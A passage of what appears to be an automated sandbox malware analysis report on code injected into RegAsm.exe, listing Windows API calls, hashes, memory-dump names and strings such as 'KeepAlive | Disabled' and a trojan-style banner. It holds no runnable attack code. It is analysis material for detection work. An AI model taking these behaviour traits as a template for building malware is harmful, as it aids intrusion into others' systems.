                                                                • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                                • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                                APIs
                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                • CloseHandle.KERNEL32(?), ref: 00405140
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                • String ID: KeepAlive | Disabled
                                                                • API String ID: 2993684571-305739064
                                                                • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                                • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                                APIs
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                                • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                                • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                • String ID: Alarm triggered
                                                                • API String ID: 614609389-2816303416
                                                                • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                                • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                                APIs
                                                                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                                • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CE00
                                                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CE0D
                                                                • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CE20
                                                                Strings
                                                                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                • API String ID: 3024135584-2418719853
                                                                • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                                • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                                • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                                APIs
                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                • _free.LIBCMT ref: 0044943D
                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 00449609
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                • String ID:
                                                                • API String ID: 1286116820-0
                                                                • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                                • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                                APIs
                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                  • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                                  • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C096
                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                • String ID:
                                                                • API String ID: 2180151492-0
                                                                • Opcode ID: 50254459e3ae93045f6dbd6e6e7947e0bfa4b0136177b8b2dd2d26406979134f
                                                                • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                                • Opcode Fuzzy Hash: 50254459e3ae93045f6dbd6e6e7947e0bfa4b0136177b8b2dd2d26406979134f
                                                                • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
                                                                • API String ID: 269201875-0
                                                                • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                                • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                                • __alloca_probe_16.LIBCMT ref: 00451231
                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                                • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                                • __freea.LIBCMT ref: 0045129D
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                • String ID:
                                                                • API String ID: 313313983-0
                                                                • Opcode ID: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                                                • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                                • Opcode Fuzzy Hash: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                                                • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                                APIs
                                                                • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                • _free.LIBCMT ref: 100071B8
                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                • String ID:
                                                                • API String ID: 336800556-0
                                                                • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                APIs
                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                                • _free.LIBCMT ref: 0044F43F
                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                • String ID:
                                                                • API String ID: 336800556-0
                                                                • Opcode ID: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                                                • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                                • Opcode Fuzzy Hash: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                                                • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                                APIs
                                                                • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                • _free.LIBCMT ref: 10005BB4
                                                                • _free.LIBCMT ref: 10005BDB
                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$_free
                                                                • String ID:
                                                                • API String ID: 3170660625-0
                                                                • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                APIs
                                                                • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                                • _free.LIBCMT ref: 00448353
                                                                • _free.LIBCMT ref: 0044837A
                                                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$_free
                                                                • String ID:
                                                                • API String ID: 3170660625-0
                                                                • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                                • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                                APIs
                                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C2B9
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C2C4
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C2CC
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CloseHandleOpen$FileImageName
                                                                • String ID:
                                                                • API String ID: 2951400881-0
                                                                • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                                • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                                APIs
                                                                • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$lstrcat
                                                                • String ID:
                                                                • API String ID: 493641738-0
                                                                • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                APIs
                                                                • _free.LIBCMT ref: 100091D0
                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                • _free.LIBCMT ref: 100091E2
                                                                • _free.LIBCMT ref: 100091F4
                                                                • _free.LIBCMT ref: 10009206
                                                                • _free.LIBCMT ref: 10009218
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                APIs
                                                                • _free.LIBCMT ref: 00450A54
                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 00450A66
                                                                • _free.LIBCMT ref: 00450A78
                                                                • _free.LIBCMT ref: 00450A8A
                                                                • _free.LIBCMT ref: 00450A9C
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                                • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                                APIs
                                                                • _free.LIBCMT ref: 1000536F
                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                • _free.LIBCMT ref: 10005381
                                                                • _free.LIBCMT ref: 10005394
                                                                • _free.LIBCMT ref: 100053A5
                                                                • _free.LIBCMT ref: 100053B6
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                APIs
                                                                • _free.LIBCMT ref: 00444106
                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 00444118
                                                                • _free.LIBCMT ref: 0044412B
                                                                • _free.LIBCMT ref: 0044413C
                                                                • _free.LIBCMT ref: 0044414D
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
